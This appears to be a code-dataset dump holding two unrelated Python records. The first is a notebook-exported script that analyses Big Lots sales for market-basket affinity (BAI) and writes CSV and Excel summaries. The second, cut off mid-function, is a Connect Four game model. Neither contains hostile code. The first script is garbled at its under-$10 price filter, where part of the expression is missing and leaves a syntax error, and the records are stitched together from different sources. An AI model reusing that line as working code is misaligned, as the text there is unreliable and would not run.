Tuesday\nlogging.basicConfig(filename='V2_Multiprocessing_'+str(last_saturday)+'.log', level=logging.INFO)\n\n\n# In[3]:\n\noutput_folder=\"/home/jian/celery/DBasket/output/\"\n\noutput_folder=output_folder+str(last_saturday)+\"/\"\n\ntry:\n os.stat(output_folder)\nexcept:\n os.mkdir(output_folder)\n\n\n# In[4]:\n\ndef recursive_file_gen(my_root_dir):\n for root, dirs, files in os.walk(my_root_dir):\n for file in files:\n yield os.path.join(root, file)\n \nmost_recent_daily_data=list(recursive_file_gen(\"/home/jian/BigLots/\"))\nmost_recent_daily_data=[x for x in most_recent_daily_data if (\"MediaStormDailySales\" in x) and (str(last_saturday) in x)]\n\nif len(most_recent_daily_data)==1:\n most_recent_daily_data=most_recent_daily_data[0]\nelse:\n most_recent_daily_data=np.nan\n logging.info(\"Last Weekly Daily Data Error\", str(datetime.datetime.now()))\n\n\n# In[5]:\n\nmost_recent_daily_data\n\n\n# In[6]:\n\ndata=pd.read_table(most_recent_daily_data,dtype=str,sep=\"|\")\nprint(\"len_sub_class_id:\",data['subclass_id'].apply(lambda x: len(x)).unique())\nprint(\"len_class_code_id:\",data['class_code_id'].apply(lambda x: len(x)).unique())\ndata['subclass_id']=data['subclass_id'].apply(lambda x: x.zfill(3))\ndata['product_comb']=data['class_code_id']+\"-\"+data['subclass_id']\n\ndata['subclass_transaction_amt']=data['subclass_transaction_amt'].astype(float)\ndata['subclass_transaction_units']=data['subclass_transaction_units'].astype(int)\ndata=data[(data['subclass_transaction_amt']>0) & (data['subclass_transaction_units']>0)]\n\ndata['price']=data['subclass_transaction_amt']/data['subclass_transaction_units']\n\n\n# In[7]:\n\ntaxonomy=pd.read_csv(\"/home/jian/BigLots/static_files/ProductTaxonomy/MediaStormProductTaxonomy20190201-133832-059.txt\",dtype=str,sep=\"|\")\ntaxonomy['subclass_id']=taxonomy['subclass_id'].apply(lambda x: x.zfill(3))\ndivision_id_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Division Names.txt\",dtype=str,sep=\"|\")\ndepartment_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Department Names.txt\",dtype=str,sep=\"|\")\nclass_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Class Names.txt\",dtype=str,sep=\"|\",encoding ='ISO-8859-1')\n# \n\ndata_item_avg_price=data[['product_comb','price']].groupby(['product_comb'])['price'].mean().to_frame().reset_index()\ndata_item_avg_price=data_item_avg_price.rename(columns={\"price\":\"avg_price\"})\n\ndata_item_avg_price['class_code_id']=data_item_avg_price['product_comb'].apply(lambda x: x.split(\"-\")[0])\ndata_item_avg_price['subclass_id']=data_item_avg_price['product_comb'].apply(lambda x: x.split(\"-\")[1])\n\ndata_item_avg_price=pd.merge(data_item_avg_price,taxonomy,on=['class_code_id','subclass_id'],how=\"left\")\n\n\ndata_item_avg_price=pd.merge(data_item_avg_price,division_id_id_name,on=\"division_id\",how=\"left\")\ndata_item_avg_price=pd.merge(data_item_avg_price,department_id_name,on=\"department_id\",how=\"left\")\ndata_item_avg_price=pd.merge(data_item_avg_price,class_id_name,on=\"class_code_id\",how=\"left\")\ndata_item_avg_price=data_item_avg_price[['product_comb','avg_price','division_id','division_desc','department_id','department_desc',\n 'class_code_id','class_code_desc','subclass_id','subclass_desc']]\n\ndata_item_avg_price.to_csv(output_folder+\"/Price_\"+str(last_saturday)+\".csv\",index=False)\n\n\n# In[8]:\n\n# $10 of all items as in the email on 2019-01-14\n\nproduct_comb_under_10_set=set(data_item_avg_price[data_item_avg_price['avg_price']=10]['product_comb'].unique().tolist()\nproduct_comb_10_and_above_df=data_item_avg_price.sort_values('avg_price',ascending=False)\nproduct_comb_10_and_above_df=product_comb_10_and_above_df[product_comb_10_and_above_df['avg_price']>=10].reset_index()\ndel product_comb_10_and_above_df['index']\n\nprint(data.shape)\ndata=data[~data['product_comb'].isin(product_comb_under_10_set)]\ndata_under_10=data[data['product_comb'].isin(product_comb_under_10_set)]\ndata=data.reset_index()\ndel data['index']\nprint(data.shape)\ndict_item_avg_price=data_item_avg_price.set_index(['product_comb'])['avg_price'].to_dict()\n\n\n# In[9]:\n\ndel data['class_code_id']\ndel data['subclass_id']\ndata_NonRewards=data[pd.isnull(data['customer_id_hashed'])]\ndata_Rewards=data[~pd.isnull(data['customer_id_hashed'])]\n\nprint(\"Rewards - Row_RawData:\",data_Rewards.shape)\nprint(\"Rewards - Unique_id:\", len(data_Rewards['customer_id_hashed'].unique()))\n\nprint(\"Non_Rewards - Row_RawData:\",data_NonRewards.shape)\nprint(\"Non_Rewards - Unique_id:\", len(data_NonRewards['customer_id_hashed'].unique()))\n# data=data[(data['subclass_transaction_amt']>0) & (data['subclass_transaction_units']>0)] #Already filtered at the beginning\n\ngc.collect()\n\n\n# In[12]:\n\ndef count_unique(x):\n return len(set(x))\n\n\n# # Get the count of actual transactions\n\n# In[13]:\n\nRewards_transactions_list=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).to_frame().reset_index().rename(columns={\"product_comb\":\"basket_list\"})\nRewards_transactions_units_sales=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['subclass_transaction_units','subclass_transaction_amt'].sum().reset_index().rename(columns={\"subclass_transaction_units\":\"total_item_units\",\"subclass_transaction_amt\":\"total_item_revenue\"})\nRewards_transactions=pd.merge(Rewards_transactions_list,Rewards_transactions_units_sales,on=['location_id','transaction_dt','transaction_id','customer_id_hashed'],how=\"left\")\nRewards_transactions['basket_str']=Rewards_transactions['basket_list'].apply(lambda x: sorted(x)).astype(str)\nRewards_transactions['transactin_id_given']=[x for x in range(1,len(Rewards_transactions)+1)]\nRewards_transactions['types']=Rewards_transactions['basket_list'].apply(lambda x: len(x))\n\n\n# In[14]:\n\nRewards_Trans_by_ID=Rewards_transactions.groupby(['customer_id_hashed'])['transactin_id_given'].count().to_frame().reset_index().rename(columns={\"transactin_id_given\":\"trans_count\"})\n\nRewards_IDCounts_by_Trans=Rewards_Trans_by_ID.groupby(['trans_count'])['customer_id_hashed'].count().to_frame().reset_index()\ndf_Rewards_IDCounts_by_Trans=Rewards_IDCounts_by_Trans.copy()\ndf_Rewards_IDCounts_by_Trans['trans_count']=np.where(df_Rewards_IDCounts_by_Trans['trans_count']>=3,\"3+\",df_Rewards_IDCounts_by_Trans['trans_count'])\ndf_Rewards_IDCounts_by_Trans['trans_count']=df_Rewards_IDCounts_by_Trans['trans_count'].replace(1,\"1\").replace(2,\"2\")\ndf_Rewards_IDCounts_by_Trans=df_Rewards_IDCounts_by_Trans.groupby(['trans_count'])['customer_id_hashed'].sum().to_frame().reset_index().rename(columns={\"customer_id_hashed\":\"ID_Counts\"})\ndf_Rewards_IDCounts_by_Trans['Label']=\"Rewards_ID\"\ndf_Rewards_IDCounts_by_Trans=df_Rewards_IDCounts_by_Trans[['Label','trans_count','ID_Counts']]\n\n\n# In[15]:\n\ndf_Non_Rewards_Trans_Count=data_NonRewards[['location_id','transaction_dt','transaction_id']].drop_duplicates()\n\ndf_output_1_count_by_trans_of_ids_price_10Plus=df_Rewards_IDCounts_by_Trans.append(pd.DataFrame({'Label':\"Non_Rewards_Trans\",'trans_count':\"1+\",'ID_Counts':len(df_Non_Rewards_Trans_Count)},index=[3]))\ndf_output_1_count_by_trans_of_ids_price_10Plus=df_output_1_count_by_trans_of_ids_price_10Plus[['Label','trans_count','ID_Counts']]\ndf_output_1_count_by_trans_of_ids_price_10Plus\n\n\n# In[16]:\n\nRewards_data_transactions_list=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).to_frame().reset_index().rename(columns={\"product_comb\":\"basket_list\"})\nRewards_data_transactions_units_sales=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['subclass_transaction_units','subclass_transaction_amt'].sum().reset_index().rename(columns={\"subclass_transaction_units\":\"total_item_units\",\"subclass_transaction_amt\":\"total_item_revenue\"})\n\nRewards_data_transactions=pd.merge(Rewards_data_transactions_list,Rewards_data_transactions_units_sales,on=['location_id','transaction_dt','transaction_id','customer_id_hashed'],how=\"left\")\nRewards_data_transactions['basket_str']=Rewards_data_transactions['basket_list'].apply(lambda x: sorted(x)).astype(str)\nRewards_data_transactions['transactin_id_given']=[x for x in range(1,len(Rewards_data_transactions)+1)]\nRewards_data_transactions['types']=Rewards_data_transactions['basket_list'].apply(lambda x: len(x))\n\n# To save\n\n\nRewards_data_transactions=pd.merge(data_Rewards,Rewards_data_transactions,on=[\"location_id\",\"transaction_dt\",\"transaction_id\",\"customer_id_hashed\"],how=\"left\")\napply_func={\"subclass_transaction_units\":\"sum\",\"transactin_id_given\":\"count\",\"subclass_transaction_amt\":\"sum\"}\n\nsingle_prod_df=Rewards_data_transactions.groupby(['product_comb'])['subclass_transaction_units','transactin_id_given','subclass_transaction_amt'].agg(apply_func).reset_index().rename(columns={\"subclass_transaction_units\":\"Total_Units\",\"transactin_id_given\":\"Total_Trans\",\"subclass_transaction_amt\":\"revenue\"})\ntotal_unit=single_prod_df['Total_Units'].sum()\ntotal_trans=len(Rewards_data_transactions)\n\nsingle_prod_df['prob_unit']=single_prod_df['Total_Units']/total_unit\nsingle_prod_df['prob_tran']=single_prod_df['Total_Trans']/total_trans\n\ndict_single_prod_unit=single_prod_df.set_index(['product_comb'])['prob_unit'].to_dict()\ndict_single_prod_tran=single_prod_df.set_index(['product_comb'])['prob_tran'].to_dict()\n\n\n# In[17]:\n\nRewards_Trans_by_ID=Rewards_Trans_by_ID.rename(columns={\"trans_count\":\"trans_count_by_id\"})\nRewards_data_transactions=pd.merge(Rewards_data_transactions,Rewards_Trans_by_ID,on=\"customer_id_hashed\",how=\"left\")\nRewards_data_transactions['trans_count_by_id']=np.where(Rewards_data_transactions['trans_count_by_id']>=3,\"3+\",Rewards_data_transactions['trans_count_by_id'])\nRewards_data_transactions['trans_count_by_id']=Rewards_data_transactions['trans_count_by_id'].replace(1,\"1\").replace(2,\"2\")\n\n\n# In[19]:\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=Rewards_data_transactions.groupby(['trans_count_by_id','types'])['transactin_id_given'].apply(count_unique).reset_index().rename(columns={\"transactin_id_given\":\"Transaction_Count\"})\ndf_output_2_1_count_by_trans_of_ids_price_10Plus_actual=df_output_2_1_count_by_trans_of_ids_price_10Plus.copy()\ndf_output_2_1_count_by_trans_of_ids_price_10Plus['types']=np.where(df_output_2_1_count_by_trans_of_ids_price_10Plus['types']>=6,\"6+\",df_output_2_1_count_by_trans_of_ids_price_10Plus['types'])\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.groupby(['trans_count_by_id','types'])['Transaction_Count'].sum().reset_index()\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.pivot_table(index=\"types\",columns=\"trans_count_by_id\",values=\"Transaction_Count\").reset_index().rename(columns={\"types\":\"item_types\"})\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.sort_values(\"item_types\")\ndf_output_2_1_count_by_trans_of_ids_price_10Plus['Label']=\"Rewards\"\ndf_output_2_1_count_by_trans_of_ids_price_10Plus\n\n\n# In[20]:\n\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=data_NonRewards.groupby(['location_id','transaction_dt','transaction_id'])['product_comb'].apply(list).reset_index()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']=df_output_2_2_count_by_trans_of_ids_price_10Plus['product_comb'].apply(len)\ndf_output_2_2_count_by_trans_of_ids_price_10Plus_actual=df_output_2_2_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].count().to_frame().reset_index()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=df_output_2_2_count_by_trans_of_ids_price_10Plus_actual.copy()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']=np.where(df_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']>=6,\"6+\",df_output_2_2_count_by_trans_of_ids_price_10Plus['item_types'])\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=df_output_2_2_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].sum().to_frame().reset_index().rename(columns={\"transaction_id\":\"Transaction_Count\"})\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['Label']=\"Non_Rewards\"\ndf_output_2_2_count_by_trans_of_ids_price_10Plus\n\n\n# In[21]:\n\ndata['customer_id_hashed']=data['customer_id_hashed'].fillna(\"nan\")\ndf_output_3_count_by_trans_of_ids_price_10Plus=data.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).reset_index()\ndf_output_3_count_by_trans_of_ids_price_10Plus['item_types']=df_output_3_count_by_trans_of_ids_price_10Plus['product_comb'].apply(len)\ndf_output_3_count_by_trans_of_ids_price_10Plus_actual=df_output_3_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].count().to_frame().reset_index()\ndf_output_3_count_by_trans_of_ids_price_10Plus=df_output_3_count_by_trans_of_ids_price_10Plus_actual.copy()\ndf_output_3_count_by_trans_of_ids_price_10Plus['item_types']=np.where(df_output_3_count_by_trans_of_ids_price_10Plus['item_types']>=6,\"6+\",df_output_3_count_by_trans_of_ids_price_10Plus['item_types'])\ndf_output_3_count_by_trans_of_ids_price_10Plus=df_output_3_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].sum().to_frame().reset_index().rename(columns={\"transaction_id\":\"Transaction_Count\"})\ndf_output_3_count_by_trans_of_ids_price_10Plus['Label']=\"Rewards_and_NonRewards\"\ndf_output_3_count_by_trans_of_ids_price_10Plus\n\n\n# In[22]:\n\nwriter=pd.ExcelWriter(output_folder+\"BL_Transaction_Summary_JL_\"+str(datetime.datetime.now().date())+\".xlsx\",engine=\"xlsxwriter\")\ndf_output_1_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_1_transactions_ids\")\ndf_output_2_1_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_2_1_Rewards_trans_items\")\ndf_output_2_2_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_2_2_NonRew_trans_items\")\ndf_output_3_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_3_all_transactions\")\nwriter.save()\n\ndel data\ngc.collect()\n\n\n# # Calcuating BAI\n\n# In[23]:\n\nunique_id_df=Rewards_data_transactions.groupby(['product_comb'])['customer_id_hashed'].apply(count_unique).to_frame().reset_index().rename(columns={\"customer_id_hashed\":\"unique_ids\"})\nsingle_prod_df=pd.merge(single_prod_df,unique_id_df,on=\"product_comb\")\n\n\n# In[24]:\n\ndata_basket=Rewards_data_transactions.groupby(['basket_str'])['total_item_units','total_item_revenue','transactin_id_given'].agg(\n {\"total_item_units\":\"sum\",\"total_item_revenue\":\"sum\",\"transactin_id_given\":\"count\"}).reset_index().rename(columns={\"transactin_id_given\":\"trans_count\"})\ndata_basket['basket_list']=data_basket['basket_str'].apply(eval)\ndata_basket['item_types']=data_basket['basket_list'].apply(len)\ndata_basket=data_basket.sort_values(['item_types','basket_str'])\n\ndata_basket=data_basket.reset_index()\ndel data_basket['index']\n\nunique_id_by_basket=Rewards_data_transactions.groupby(['basket_str'])['customer_id_hashed'].apply(lambda x: len(set(x))).to_frame().reset_index().rename(columns={'customer_id_hashed':\"unique_ids\"})\ndata_basket=pd.merge(data_basket,unique_id_by_basket,on=\"basket_str\",how=\"left\")\n\n\n# In[25]:\n\n# data_basket.to_csv(\"/home/jian/Projects/Big_Lots/Analysis/2018_Q4/Product_Basket/data_for_freq_dist_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n# In[26]:\n\nfrom itertools import combinations\ndef findsubsets(total_set,item_counts):\n return list(set(combinations(total_set, item_counts)))\n\nfor i in range(2,6):\n locals()['set_'+str(i)+\"_comb\"]=[]\n output_1_basket_str_list_i=sorted(data_basket[data_basket['item_types']==i]['basket_str'].unique().tolist())\n output_2_basket_str_list_i_plus=[]\n basket_str_list_i_plus=data_basket[data_basket['item_types']>i]['basket_str'].unique().tolist()\n \n \n for set_str in basket_str_list_i_plus:\n set_list=eval(set_str)\n output_2_basket_str_list_i_plus=list(set(output_2_basket_str_list_i_plus+[str(list(x)) for x in findsubsets(set_list,i)]))\n \n locals()['set_'+str(i)+\"_comb\"]=sorted(list(set(output_1_basket_str_list_i+output_2_basket_str_list_i_plus)))\n print(i, datetime.datetime.now())\n print(len(locals()['set_'+str(i)+\"_comb\"]))\n \n\n\n# In[27]:\n\n'''\nbasket_transaction_2_plus=data_basket[data_basket['item_types']>=2][['basket_str','trans_count']]\nbasket_transaction_3_plus=data_basket[data_basket['item_types']>=3][['basket_str','trans_count']]\nbasket_transaction_4_plus=data_basket[data_basket['item_types']>=4][['basket_str','trans_count']]\nbasket_transaction_5_plus=data_basket[data_basket['item_types']>=5][['basket_str','trans_count']]\n'''\n\n\n# In[28]:\n\nlist_set_all=set_2_comb+set_3_comb+set_4_comb+set_5_comb\ntotal_len=len(list_set_all)\ntotal_len\n\n\n# In[30]:\n\nprocessors=25\n\ninterval=int(np.floor(total_len/processors))\n# list_set_all_subset_0=list_set_all_subset_[:interval]\n# 0 to 9, 10 in total\nall_list_of_input=[]\nfor i in range(processors-1): \n #1 to 9\n locals()['list_set_all_subset_'+str(i)]=list_set_all[interval*i:interval*(i+1)]\n all_list_of_input=all_list_of_input+[locals()['list_set_all_subset_'+str(i)]]\nlocals()['list_set_all_subset_'+str(processors-1)]=list_set_all[interval*(processors-1):]\nall_list_of_input=all_list_of_input+[locals()['list_set_all_subset_'+str(processors-1)]]\n\n\n# In[32]:\n\ndef getting_BAI_items(list_set_subset_i):\n i_counter=0\n dict_basket_support_trans={}\n dict_basket_support_items={}\n dict_basket_BAI_trans={}\n dict_basket_BAI_items={}\n dict_basket_unique_ids={}\n dict_basket_revenue={} #revenue only for the selected subset of items\n for basket_n in list_set_subset_i:\n basket_n_list=eval(basket_n)\n len_items=len(basket_n_list)\n \n df=Rewards_data_transactions[Rewards_data_transactions['product_comb'].isin(basket_n_list)][['basket_str','transactin_id_given','subclass_transaction_units','customer_id_hashed','subclass_transaction_amt']]\n \n trans_denominator=1\n items_denominator=1\n \n for k in range(len_items):\n globals()['basket_item_'+str(k)]=basket_n_list[k]\n df=df[df['basket_str'].apply(lambda x: globals()['basket_item_'+str(k)] in x)]\n trans_denominator=trans_denominator*dict_single_prod_tran[globals()['basket_item_'+str(k)]]\n items_denominator=items_denominator*dict_single_prod_unit[globals()['basket_item_'+str(k)]]\n\n trans_basket=len(df['transactin_id_given'].unique())\n items_basket=df['subclass_transaction_units'].sum()\n unique_ids_basket=len(df['customer_id_hashed'].unique())\n revenue_bakset=df['subclass_transaction_amt'].sum()\n \n dict_basket_support_trans.update({basket_n:trans_basket})\n dict_basket_support_items.update({basket_n:items_basket})\n dict_basket_unique_ids.update({basket_n:unique_ids_basket})\n dict_basket_revenue.update({basket_n:revenue_bakset})\n\n BAI_basket_trans=(trans_basket/total_trans)/trans_denominator*100\n BAI_basket_items=(items_basket/total_unit)/items_denominator*100\n \n dict_basket_BAI_trans.update({basket_n:BAI_basket_trans})\n dict_basket_BAI_items.update({basket_n:BAI_basket_items})\n \n i_counter+=1\n if i_counter%1000==10:\n logging.info(str(datetime.datetime.now())+\"|\"+str(i_counter))\n results_json={}\n results_json.update({\"dict_basket_support_trans\":dict_basket_support_trans})\n results_json.update({\"dict_basket_support_items\":dict_basket_support_items})\n results_json.update({\"dict_basket_BAI_trans\":dict_basket_BAI_trans})\n results_json.update({\"dict_basket_BAI_items\":dict_basket_BAI_items})\n results_json.update({\"dict_basket_unique_ids\":dict_basket_unique_ids})\n results_json.update({\"dict_basket_revenue\":dict_basket_revenue})\n \n return results_json\n\n\n# In[33]:\n\nfrom multiprocessing import Pool\n\nresult_dict_basket_support_trans={}\nresult_dict_basket_support_items={}\nresult_dict_basket_BAI_trans={}\nresult_dict_basket_BAI_items={}\nresult_dict_basket_unique_ids={}\nresult_dict_basket_revenue={}\n\nif __name__ == '__main__':\n p = Pool(processors)\n result=p.map(getting_BAI_items, all_list_of_input)\n for res in result:\n if res is not None:\n result_dict_basket_support_trans.update(res[\"dict_basket_support_trans\"])\n result_dict_basket_support_items.update(res[\"dict_basket_support_items\"])\n result_dict_basket_BAI_trans.update(res[\"dict_basket_BAI_trans\"])\n result_dict_basket_BAI_items.update(res[\"dict_basket_BAI_items\"])\n result_dict_basket_unique_ids.update(res['dict_basket_unique_ids'])\n result_dict_basket_revenue.update(res['dict_basket_revenue'])\n p.close()\n p.join()\n \n\n\n# In[35]:\n\noutput_1=data_basket[data_basket['item_types']==1]\noutput_2=data_basket[data_basket['item_types'].isin([2,3,4,5])]\noutput_3=data_basket[data_basket['item_types']>5]\n\noutput_1['BAI_trans']=100\noutput_1['BAI_items']=100\n\noutput_2['BAI_trans']=output_2['basket_str'].apply(lambda x: result_dict_basket_BAI_trans[x])\noutput_2['BAI_items']=output_2['basket_str'].apply(lambda x: result_dict_basket_BAI_items[x])\n\noutput_basket=output_1.append(output_2).append(output_3) # To add those only in multiple item trans\n#E.g. [a,b,c,d] [a,c] doesn't exsit\n\n\n# In[37]:\n\nsingle_prod_df['BAI_Trans']=100\nsingle_prod_df['BAI_Items']=100\n\n\n# In[38]:\n\ndf1=pd.DataFrame(result_dict_basket_support_trans,index=['Total_Trans']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf2=pd.DataFrame(result_dict_basket_support_items,index=['Total_Units']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf3=pd.DataFrame(result_dict_basket_BAI_trans,index=['BAI_Trans']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf4=pd.DataFrame(result_dict_basket_BAI_items,index=['BAI_Items']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf5=pd.DataFrame(result_dict_basket_unique_ids,index=['unique_ids']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf6=pd.DataFrame(result_dict_basket_revenue,index=['revenue']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\n\noutput_all_2345_available=pd.merge(df1,df2,on='basket_str')\noutput_all_2345_available=pd.merge(df3,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df4,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df5,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df6,output_all_2345_available,on='basket_str')\n\n\n# In[40]:\n\nsingle_prod_df['basket_str']=\"['\"+single_prod_df['product_comb']+\"']\"\ndel single_prod_df['product_comb']\n\noutput_all_12345_available=single_prod_df.append(output_all_2345_available)\noutput_all_12345_available['basket_list']=output_all_12345_available['basket_str'].apply(eval)\noutput_all_12345_available['item_types']=output_all_12345_available['basket_list'].apply(len)\noutput_all_12345_available=output_all_12345_available.sort_values('item_types',ascending=True)\n\n# All posibble from the shopped large basket 1-5\noutput_3=data_basket[data_basket['item_types']>5]\noutput_3=output_3.rename(columns={\"trans_count\":\"Total_Trans\",\"total_item_units\":\"Total_Units\",\"total_item_revenue\":\"revenue\"})\n\noutput_all_12345_available=output_all_12345_available.append(output_3) #Appended >5\n\n\n# # Step 2\n\n# In[49]:\n\n# Apply the BAI of items to the baskets\n\nlen(result_dict_basket_BAI_items)\ndata_item_avg_price_dict=data_item_avg_price.set_index([\"product_comb\"]).to_dict()['avg_price']\nlen(data_item_avg_price_dict)\n\n\n# In[51]:\n\n'''\ndef brewak_basket_to_top_5(input_x):\n input_x=eval(input_x)\n len_input_x=len(input_x)\n df=pd.DataFrame({\"subcalss_item\":input_x},index=range(len(len_input_x)))\n df['price']=df['subcalss_item'].apply(lambda x: data_item_avg_price_dict[x])\n df=df.sort_values(\"price\",ascending=False).head(5)\n \n chapion_subclass=df['subcalss_item'].tolist()[0]\n df['class_code_id']=df['subcalss_item'].apply(lambda x: x.split({\"-\"}[0]))\n chapion_subclass_id=df['class_code_id'].tolist(0)\n \n complementary_subclass_df=df[df['class_code_id']==chapion_class_id]\n \n if len(complementary_subclass_df)>0:\n complementary_subclass_df_1=complementary_subclass_df.head(3)\n complementary_subclass_df_2=\n'''\n\n\n# In[26]:\n\n'''\nwriter=pd.ExcelWriter(output_folder+\"/BL_DBasket_Version2_JL_'+str(datetime.datetime.now().date())+\".xlsx\",engine=\"xlsxwriter\")\n# output=output[['basket_str','basket_list','BAI_trans','BAI_units','item_types','total_item_revenue','total_item_units','trans_count','unique_ids','price_list']]\noutput_all_12345_available=output_all_12345_available[['basket_list','BAI_Trans','BAI_Items','item_types','revenue','Total_Units','Total_Trans','unique_ids']]\noutput_all_12345_available=output_all_12345_available.sort_values(['item_types','BAI_Trans'],ascending=[True,False])\noutput_all_12345_available.to_excel(writer,\"BAI_including_subsets\",index=False)\ndata_basket.to_excel(writer,\"basket_shopped_together\",index=False)\nwriter.save()\n'''\nlogging.info(\"Done: \"+str(datetime.datetime.now()))\n\n\n# In[27]:\n\noutput_all_12345_available.to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\ndata_basket.to_csv(output_folder+\"/BL_DBasket_Version2_actual_whole_baskets_output_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n\n# In[37]:\n\noutput_all_12345_available[output_all_12345_available['item_types']==1].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_1_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==2].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_2_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==3].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_3_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==4].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_4_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==5].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_5_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']>5].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_6Plus_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n\n","sub_path":"code_back_up/backuped_on_sharefolder_2021-01-06_000/00486_PY_20190202.py","file_name":"00486_PY_20190202.py","file_ext":"py","file_size_in_byte":27212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289312082","text":"from c4exceptions import IllegalMoveError\n\nPLAYER1 = 1\nPLAYER2 = 2\nEMPTY = -1\n\n\nclass ConnectFourModel:\n def __init__(self):\n self.__grid = None\n self.__turn = -1\n self.__grid_observers = []\n self.__result_observers = []\n\n def initialize(self):\n self.__grid = []\n for i in range(7):\n row = []\n for j in range(6):\n row.append(EMPTY)\n self.__grid.append(row)\n\n self.__turn = PLAYER1\n self.__notify_grid_observers()\n\n def set_grid_position(self, column, player):\n if column < 0 or column > 6:\n raise IllegalMoveError(column, player)\n\n row = 5\n while self.__grid[column][row] != EMPTY:\n row -= 1\n\n if row < 0:\n raise IllegalMoveError(column, player)\n\n self.__grid[column][row] = player\n self.__notify_grid_observers()\n\n result = self.check_for_winner()\n if result > 0:\n self.__notify_result_observers(result)\n elif self.check_for_draw():\n self.__notify_result_observers(0)\n\n return row\n\n def __notify_grid_observers(self):\n for o in self.__grid_observers:\n o.update_grid()\n\n def __notify_result_observers(self, result):\n for o in self.__result_observers:\n o.report_result(result)\n\n def check_for_winner(self):\n win = self.__check_horizontal_win()\n if win < 0:\n win = self.__check_vertical_win()\n if win < 0:\n win = self.__check_neg_diagonal_win()\n if win < 0:\n win = self.__check_pos_diagonal_win()\n\n return win\n\n def __check_horizontal_win(self):\n win = False\n for row in range(6):\n for col in range(4):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col + 1][row]) and (\n self.__grid[col][row] == self.__grid[col + 2][row]) and (\n self.__grid[col][row] == self.__grid[col + 3][row])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_vertical_win(self):\n win = False\n for col in range(7):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col][row + 1]) and (\n self.__grid[col][row] == self.__grid[col][row + 2]) and (\n self.__grid[col][row] == self.__grid[col][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_neg_diagonal_win(self):\n win = False\n for col in range(4):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col + 1][row + 1]) and (\n self.__grid[col][row] == self.__grid[col + 2][row + 2]) and (\n self.__grid[col][row] == self.__grid[col + 3][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_pos_diagonal_win(self):\n win = False\n for col in range(3, 7):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col - 1][row + 1]) and (\n self.__grid[col][row] == self.__grid[col - 2][row + 2]) and (\n self.__grid[col][row] == self.__grid[col - 3][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def check_for_draw(self):\n for i in range(7):\n for j in range(6):\n if self.__grid[i][j] == EMPTY:\n return False\n 